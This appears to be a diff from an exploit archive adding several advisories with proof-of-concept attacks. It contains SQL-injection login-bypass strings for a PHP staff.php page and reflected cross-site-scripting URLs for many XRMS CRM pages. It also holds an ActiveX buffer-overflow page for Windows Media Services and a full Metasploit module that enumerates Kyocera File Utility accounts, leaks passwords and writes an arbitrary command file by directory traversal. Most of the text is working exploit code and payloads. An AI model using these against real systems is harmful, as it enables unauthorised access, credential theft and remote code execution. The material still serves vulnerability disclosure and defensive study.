<input type='submit' name='Submit4' value="Agregar">
</form>
</html>
Authentication Bypass:
File: staff.php
[PHP]
if(isset($_POST['user'])){
$user = $_POST['user'];
$pass = $_POST['pass'];
$userreg=mysql_query("select * from staff WHERE user='$user' AND pass='$pass'") or die ("ERROR 1");
[PHP]
Username:1'or'1'='1
Password:1'or'1'='1
5.Solution(s):
no contact from vendor
6.TIME-LINE:
2014-13-03: Vulnerability was discovered.
2014-13-03: Contact with vendor.
2014-14-03: No reply.
2014-15-03: No reply.
2014-15-03: Vulnerability Published
7.Greetings:
Xmax-tn
Xtech-set
N43il
Sec4ver,E4A Members

7
platforms/php/webapps/32320.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/activities/some.php?title="><script>alert(1);</script>

7
platforms/php/webapps/32321.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/companies/some.php?company_name="><script>alert(1);</script>

7
platforms/php/webapps/32322.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/contacts/some.php?last_name="><script>alert(1);</script>

7
platforms/php/webapps/32323.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/campaigns/some.php?campaign_title="><script>alert(1);</script>

7
platforms/php/webapps/32324.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/opportunities/some.php?opportunity_title="><script>alert(1);</script>

7
platforms/php/webapps/32325.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/cases/some.php?case_title="><script>alert(1);</script>

7
platforms/php/webapps/32326.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/files/some.php?file_id="><script>alert(1);</script>

7
platforms/php/webapps/32327.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31008/info
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xrms/reports/custom/mileage.php?starting="><script>alert(1);</script>

18
platforms/windows/dos/32294.html Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/30814/info
The Microsoft Windows Media Services ActiveX control is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
An attacker can exploit this issue to execute arbitrary code in the context of an application using the affected ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
'nskey.dll' 4.1.00.3917 is vulnerable; other versions may also be affected.
<html><body>
<object id=target classid=clsid:2646205B-878C-11D1-B07C-0000C040BCDB></object>
<script language=vbscript>
arg1=String(9752, "A")
target.CallHTMLHelp arg1
</script>
</body></html>

354
platforms/windows/remote/32301.py Executable file
View file

@ -0,0 +1,354 @@
source: http://www.securityfocus.com/bid/30855/info
Kyocera Mita Scanner File Utility is prone to a directory-traversal vulnerability because it fails to adequately sanitize user-supplied input.
Attackers can exploit this issue to create and overwrite arbitrary files on the affected computer.
Kyocera Mita Scanner File Utility 3.3.0.1 is vulnerable; other versions may also be affected.
module Msf
class Auxiliary::Spoof::Kyocera::FileUtility < Msf::Auxiliary
#
# This exploit affects TCP servers, so we use the TCP client mixin.
#
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Kyocera Mita File Utility File Injection',
'Description' => %q{
This exploit attacks the Kyocera Mita File Utility 3.3.0.1 that is part of a scan to desktop
solution. There are several bugs in this service. First, there is no authentication. This means anyone
can upload a file to the target PC. Second, the file can contain anything, including binary data. Finally,
the file name can be altered to include directory information, thus redirecting the file from
the default upload location to a specified location. Combined, the service will allow a remote attacker
to upload any file to any location on the system. If you do
not know the correct ID number of the client side account, you can use the included getidno command to
scan a system to detect any and all ID numbers. This will also provide you with any associated
passwords required by printer to upload documents.
},
'Author' => 'Seth Fogie <seth@whitewolfsecurity.com>'
)
)
register_options(
[
OptString.new('RPORT', [ true, "Target port - default is 37100", '37100' ]),
OptString.new('RHOST', [ true, "Target host", '1']),
OptString.new('CMD', [ true, "Command", 'calc.exe']),
OptInt.new('IDNO', [ true, "ID number (1-100)", '1']),
OptString.new('IDENT', [ true, "Identification name", 'ANON']),
OptString.new('FILENAME', [ true, "File name (with folder)", 'Kyocera.bat']),
OptString.new('FOLDER', [ false, "Folder (relative to scan folder)", '']),
], self.class
)
end
def auxiliary_commands
return {
"getidno" => "Determine a correct idno",
}
end
#this command detects any and all valid accounts on target machine and returns associated passwords.
def cmd_getidno()
1.upto(100) do |i|
connect
print(".")
# Build the buffer for transmission
buf= "\x00\x06\x34\x00\x00\x02\x00\x00" #control message to PC
# Send it off and get response
sock.put(buf)
sock.get
#add ID number
idno = i
buf = "\x02\x1c\x34\x02" + #details about file name for file utility function
[idno].pack('n') + #ID number
"\x00\x08" +
"\x00\x0d" +
"\x41\x41\x41\x41\x00\x4e\x53\x4e\x5f\x53\x4b\x41\x4e\x3a" +
"\x41\x41\x41\x41\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00"
sock.put(buf)
nulls="\x00\x00"
passTest="\xFF\xFF"
data=sock.get
dataStr=data.to_s
if dataStr[dataStr.length-6,2] == nulls
print("\n")
print_status("Valid account number found: " + i.to_s)
end
if dataStr[dataStr.length-2,2] != passTest
print_status("BONUS! Password! (last four or eight characters of string)" )
j=0
while j<12
printf("%X",data[j])
j+=1
end
print("\n")
end
sock.close
end
print("\n")
end
#
# The exploit sends the specified command into a kyocera.bat file in the specified folder
#
def run
begin
connect
print_status("Sending command...")
# Build the buffer for transmission
buf= "\x00\x06\x34\x00\x00\x02\x00\x00" #control message to PC
# Send it off and get response
sock.put(buf)
sock.get
#add ID number
idno = datastore['IDNO']
ident = datastore['IDENT']
filename = datastore['FILENAME']
folder = datastore['FOLDER']
locationLength = filename.length + folder.length
buf = "\x02\x1c\x34\x02" + #details about file name for file utility function
[idno].pack('n') + #ID number
"\x00\x08" +
"\x00\x0d" +
"\x41\x41\x41\x41" +
"\x00\x4e\x53\x4e\x5f\x53\x4b\x41\x4e\x3a" +
ident +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00"
sock.put(buf)
nulls="\x00\x00"
passTest="\xFF\xFF"
data=sock.get
dataStr=data.to_s
#print_status(nulls)
#print_status(dataStr[dataStr.length-6,2])
if dataStr[dataStr.length-6,2] != nulls
print_status("Invalid account number - use getidno command to find valid idno")
end
if dataStr[dataStr.length-2,2] != passTest
print_status("BONUS! Password! (last four or 8 characters of string)" )
j=0
while j<12
printf("%X",data[j])
j+=1
end
print("\n")
end
buf = "\x00\x54" + #details about file name
"\x30" + #location size (must be x30)
"\x01" + #can be altered to include folder and file
"\x00\x05\x00\x00" +
"\xff\xff\xff\xff\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x24" +
folder + filename
padding = 48-locationLength
j=0
while j<padding
buf += "\x00"
j+=1
end
#"\x4b\x79\x6f\x63\x65\x72\x61\x2e\x62\x61\x74" +
#"\x00\x00\x00"
#add command length
thecommand = datastore['CMD']
cmdLen = thecommand.length
buf += [cmdLen].pack('N')
#add command
buf << thecommand
j=0
#put file
sock.put(buf)
buf = "\x00\x04\x30\x02\x00\x00"
sock.put(buf)
buf="\x00\x04\x30\x05\x53\xdc"
sock.put(buf)
sock.get
buf="\x00\x04\x30\x03\x00\x00"
sock.put(buf)
sock.get
end
end
end
end